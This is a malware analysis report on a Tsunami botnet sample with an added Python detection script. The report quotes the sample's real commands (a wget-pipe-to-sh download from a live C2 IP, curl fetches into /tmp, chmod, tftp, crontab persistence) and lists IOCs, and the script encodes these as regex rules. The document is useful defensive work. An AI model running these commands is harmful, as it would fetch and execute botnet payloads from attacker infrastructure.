Report information
Summary
This sample belongs to the Tsunami family and is a botnet-type sample.
Sample type
Botnet
elkeid sample ID
elkeid_20221208_botnet_6
Keywords
tsunami,irq,tty,tsh,3sh,x001804289383
Capture time
20221208
Last active time
20221208
Known intrusion vectors
- Weak-password brute forcing
Samples involved
- /tmp/irq0(irq1,irq2)
- /tmp/pty
- /tmp/tty0(tty1...tty6)
- /tmp/1sh(2sh,3sh,tsg)
Main behaviors
- Download
  - bash -c wget -qO - http://113.106.167.11/x/2sh | sh > /dev/null 2>&1 &
  - curl http://113.106.167.11/x/tty2 -o /tmp/tty2
  - curl http://113.106.167.11/x/pty -o pty
- Permission change
  - chmod 777 /tmp/irq1
  - chmod +x /tmp/tty6
  - ...
- Execution
  - sh /var/run/1sh &
  - tftp -g 127.0.0.1 -r tsh ; sh tsh
  - /bin/sh ./irq1
  - crontab /var/run/.x001804289383
- Scan
  - ip -4 addr change 172.9.58.46/255.255.0.0 broadcast 172.9.255.255 valid_lft 1800 preferred_lft 1800 dev ens3 label ens3
  - (This is the only command recorded under this heading. As written it assigns the secondary address 172.9.58.46/16 to ens3 with an 1800 s lifetime, i.e. it prepares the host's own network configuration; no probe of other hosts is shown here.)
IOC
- 113.106.167.11
- 83.252.207.213
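The behaviors and IOCs above translate directly into host-hunting rules: the two C2 addresses, the `wget -qO - … | sh` download chain, `curl` writes into /tmp, the `chmod 777`/`chmod +x` on /tmp, the `tftp -g` fetch, the `crontab /var/run/.x…` persistence, and the dropped-file names. The following is an added example (not part of the Elkeid report, and not code from the sample or the Elkeid project) that encodes those indicators as regular expressions and runs them over a constructed list of shell-history / process command lines, several of which are lifted from the report and several of which are benign lines invented here to show that the rules do not fire on ordinary administration. The `ip -4 addr change` rule is included because the report lists it, but it is flagged as low confidence since the same command has legitimate uses.

```python
import re

# C2 addresses taken from the IOC list above.
C2_IPS = {"113.106.167.11", "83.252.207.213"}

# Dropped-file names from "Samples involved" (/tmp/irq0-2, /tmp/pty, /tmp/tty0-6,
# /tmp/1sh,2sh,3sh,tsg) plus the /var/run paths and the bare "tsh" from the
# "Execution" commands. The look-around keeps e.g. /tmp/tty10 or "deploy.sh" out.
DROPPED_FILE_RE = re.compile(
    r"(?:^|[\s/])"
    r"(?:/tmp/(?:irq[0-2]|pty|tty[0-6]|[123]sh|tsg)"
    r"|/var/run/(?:1sh|\.x001804289383)"
    r"|tsh)"
    r"(?=$|[\s;&|)])"
)

# Digit look-arounds stop 113.106.167.11 from also matching 113.106.167.110.
C2_IP_RE = re.compile(
    r"(?<!\d)(?:" + "|".join(re.escape(ip) for ip in sorted(C2_IPS)) + r")(?!\d)"
)

# (rule name, pattern). Every pattern mirrors one command shape in the report.
RULES = [
    ("c2_ip", C2_IP_RE),
    ("pipe_to_sh", re.compile(r"\bwget\s+-qO\s*-\s+\S+\s*\|\s*sh\b")),
    ("curl_to_tmp", re.compile(r"\bcurl\b.*\s-o\s+/tmp/")),
    ("chmod_tmp", re.compile(r"\bchmod\s+(?:777|\+x)\s+/tmp/")),
    ("tftp_fetch", re.compile(r"\btftp\s+-g\b")),
    ("crontab_install", re.compile(r"\bcrontab\s+/var/run/\.")),
    ("dropped_file", DROPPED_FILE_RE),
    # Low confidence: legitimate admins run this too; correlate with the rules above.
    ("ip_addr_change", re.compile(r"\bip\s+-4\s+addr\s+change\b")),
]


def scan_lines(lines):
    """Return (rule_name, line) for every rule that matches each line."""
    hits = []
    for line in lines:
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((name, line))
    return hits


def flagged_lines(lines):
    """Lines that triggered at least one rule, in input order, without duplicates."""
    seen = []
    for _, line in scan_lines(lines):
        if line not in seen:
            seen.append(line)
    return seen


def hits_by_rule(lines):
    """Number of lines each rule fired on."""
    counts = {}
    for name, _ in scan_lines(lines):
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed input: the first seven lines are copied from the report's behavior
# list, the rest are made-up benign commands that must not be flagged.
SAMPLE_LINES = [
    "bash -c wget -qO - http://113.106.167.11/x/2sh | sh > /dev/null 2>&1 &",
    "curl http://113.106.167.11/x/tty2 -o /tmp/tty2",
    "chmod 777 /tmp/irq1",
    "sh /var/run/1sh &",
    "tftp -g 127.0.0.1 -r tsh ; sh tsh",
    "crontab /var/run/.x001804289383",
    "ip -4 addr change 172.9.58.46/255.255.0.0 broadcast 172.9.255.255 "
    "valid_lft 1800 preferred_lft 1800 dev ens3 label ens3",
    "curl https://example.com/index.html -o /home/admin/index.html",
    "chmod +x /usr/local/bin/deploy.sh",
    "sh /opt/app/run.sh &",
    "crontab -l",
    "ip -4 addr show dev ens3",
]

if __name__ == "__main__":
    for name, line in scan_lines(SAMPLE_LINES):
        print(f"[{name}] {line}")
```

In practice the input would be `~/.bash_history`, `/var/spool/cron/*`, or `ps -eo args` output collected by an agent; the rules are deliberately narrow so that a single `dropped_file` or `c2_ip` hit is already actionable, while `ip_addr_change` should only raise severity when it co-occurs with one of the others.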
Reference links
- tsunami.elf
https://threatfox.abuse.ch/browse/malware/elf.tsunami/
- 113.106.167.11
https://www.virustotal.com/gui/url/9feeefbeb83e31d62a1da584db2a42d6a74ad4627bcfdca7fc1e54d3eb405021